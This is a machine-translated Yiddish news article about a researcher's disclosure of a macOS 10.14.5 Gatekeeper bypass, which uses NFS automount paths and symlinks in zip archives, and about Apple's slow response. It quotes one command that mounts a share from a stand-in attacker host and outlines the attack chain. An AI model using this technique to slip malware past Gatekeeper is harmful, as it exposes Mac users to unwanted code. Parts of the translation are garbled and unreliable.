אַמייַאַ טאָמאַן זיכערהייט פאָרשער Filippo Cavallarin האָט אַרייַנגעשיקט אַ ווארענונג וועגן דעם זשוק אין macOS 10.14.5 אויף זיין בלאָג. דא ס אי ז באשטאנע ן אי ן דע ר מעגלעכקײ ט פו ן אינגאנצ ן דורכגײ ן ד י זיכערקײטם־מיטל ן פו ן טויער ־ היטער . לויט קאַוואַללאַרין, ער האָט אָנגעוויזן דעם טעות צו עפּל שוין אין פעברואר פון דעם יאָר, אָבער די פירמע האט נישט פאַרריכטן עס אין די לעצטע דערהייַנטיקן.
גייטקעעפּער איז דעוועלאָפּעד דורך עפל און ינקאָרפּערייטיד אין זייַן דעסקטאַפּ אָפּערייטינג סיסטעם פֿאַר די ערשטער מאָל אין 2012. עס איז אַ מעקאַניזאַם וואָס פּריווענץ אַ אַפּלאַקיישאַן פון לויפן אָן דער באַניצער ס וויסן און צושטימען. נאָך איר אראפקאפיע אַן אַפּ, Gatekeeper אויטאָמאַטיש טשעק זיין קאָד צו זען אויב די ווייכווארג איז רעכט געחתמעט דורך עפּל.
עס קען זיין אינטערעסירן איר
אין זיין בלאָג פּאָסטן, Cavallarin זאגט אַז Gatekeeper, דורך פעליקייַט, האלט ביידע פונדרויסנדיק סטאָרידזש און נעץ שאַרעס צו זיין זיכער לאָוקיישאַנז. יעדער אַפּלאַקיישאַן וואָס ריזיידז אין די טאַרגאַץ קענען דעריבער זיין אויטאָמאַטיש לאָנטשט אָן דורכגיין די גייטקעעפּער טשעק. עס איז דעם שטריך וואָס קענען זיין עקספּלויטאַד צו קאַטער בייזע ווייכווארג אָן דער באַניצער ס וויסן.
איין אַספּעקט וואָס אַלאַוז אַנאָטערייזד אַקסעס איז די אַוטאָמאָונט שטריך, וואָס אַלאַוז ניצערס צו אויטאָמאַטיש אָנקלאַפּן אַ נעץ ייַנטיילן פשוט דורך ספּעציפיצירן אַ דרך אָנהייב מיט "/ נעץ/". ווי אַ ביישפּיל, Cavallarin ציטירט דעם דרך "ls /net/evil-attacker.com/sharedfolder/" וואָס קענען אָנמאַכן די אָפּערייטינג סיסטעם צו מאַסע די אינהאַלט פון אַ "שאַרעפאָלדער" טעקע אין אַ ווייַט אָרט וואָס קען זיין פּאַטענטשאַלי בייזע.
איר קענט זען ווי די סאַקאָנע אַרבעט אין די ווידעא:
אן אנדער פאַקטאָר איז דער פאַקט אַז אויב אַ פאַרשלעסלען אַרקייוו מיט אַ ספּעציפיש סימלינק וואָס פירן צו די אַוטאָמאָונט פֿונקציע איז שערד, עס וועט נישט זיין אָפּגעשטעלט דורך Gatekeeper. דעם וועג, די קאָרבן קענען לייכט אראפקאפיע די בייזע אַרקייוו און אַנזיפּ עס, אַלאַוינג די אַטאַקער צו לויפן כמעט קיין ווייכווארג אויף די מעק אָן דער באַניצער ס וויסן. דער פינדער, וואָס כיידז זיכער יקסטענשאַנז דורך פעליקייַט, אויך האט זיין טיילן פון דעם וואַלנעראַביליטי.
Cavallarin זאגט אויף זיין בלאָג אַז עפּל געצויגן ופמערקזאַמקייט צו די וואַלנעראַביליטי פון די macOS אָפּערייטינג סיסטעם אויף 22 פעברואר פון דעם יאָר. אָבער אין מיטן מייַ, עפּל פארשטאפט קאַמיונאַקייטינג מיט קאַוואַללאַרין, אַזוי קאַוואַללאַרין באַשלאָסן צו מאַכן די גאנצע זאַך עפנטלעך.
מקור: FCVL
